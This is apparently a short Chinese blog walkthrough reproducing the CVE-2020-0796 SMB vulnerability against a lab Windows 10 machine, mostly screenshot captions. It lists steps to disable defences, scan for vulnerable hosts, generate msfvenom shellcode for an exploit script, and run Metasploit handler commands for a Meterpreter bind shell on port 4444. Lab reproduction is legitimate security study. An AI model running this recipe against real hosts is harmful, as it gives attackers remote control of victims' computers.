CVE-2020-0796 WIN10 永恒之黑漏洞复现

1.禁用windows update

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第1张图片

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第2张图片

2.关闭windows防火墙

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第3张图片

3.主机发现

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第4张图片

Vulnerable  代表易攻击  也可以把ip改为 10.3.139.0/24扫描网段  

4.用msfvenom生成python类型的shellcode

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第5张图片

5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第6张图片

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第7张图片

6.MSF监听4444端口

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第8张图片

  1. use exploit/multi/handler
  2. set payload windows/x64/meterpreter/bind_tcp
  3. set lport 4444
  4. set rhost 192.168.152.167 (Win10的IP地址)
  5. run

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第9张图片

7.运行exp脚本

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第10张图片

8.成功反弹shell

CVE-2020-0796 WIN10 永恒之黑漏洞复现_第11张图片

你可能感兴趣的:(DC-1-9通关秘籍)